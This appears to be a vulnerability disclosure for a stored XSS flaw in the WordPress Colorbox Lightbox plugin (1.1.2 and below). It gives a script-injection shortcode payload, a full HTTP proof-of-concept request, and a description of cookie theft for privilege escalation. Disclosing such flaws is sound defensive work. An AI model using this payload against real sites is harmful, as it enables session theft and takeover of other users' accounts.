Stored XSS Vulnerability in WordPress Colorbox Lightbox Plugin

WordPress Colorbox Lightbox Plugin version 1.1.2 and below were found to be vulnerable to stored XSS while I was auditing the plugin.

Summary

WordPress Colorbox Lightbox plugin is used to add a lightbox functionality while adding videos to your WordPress site. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Vulnerability

The ‘hyperlink’ field in used while linking an image from a URL was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using WordPress Colorbox Lightbox version 1.1.2 and below are affected.

The image below shows our javascript is being executed when the following string is inserted into the post.

[wp_colorbox_media url="http://www.youtube.com/embed/nmp3Ra3Yj24" type="youtube" hyperlink="<script>alert(0)</script>"]

This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website. A less privileged user can exploit this vulnerability to steal the administrator’s cookies for privilege escalation. Thiscan lead to takeover of the web server.

Proof of Concept

POST /w/wp-json/wp/v2/posts/211?_locale=user HTTP/1.1
Host: 127.0.0.1
Content-Length: 148
Accept: application/json, */*;q=0.1
X-WP-Nonce: 6c6cd8b63e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: http://127.0.0.1
Referer: http://127.0.0.1/w/wp-admin/post.php?post=211&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791
Connection: close

{"id":211,"content":"[wp_colorbox_media url=\"http://www.youtube.com/embed/nmp3Ra3Yj24\" type=\"youtube\" hyperlink=\"<script>alert(0)</script>\"]"}

Recommendation

All user inputs should be sanitized before publishing the post.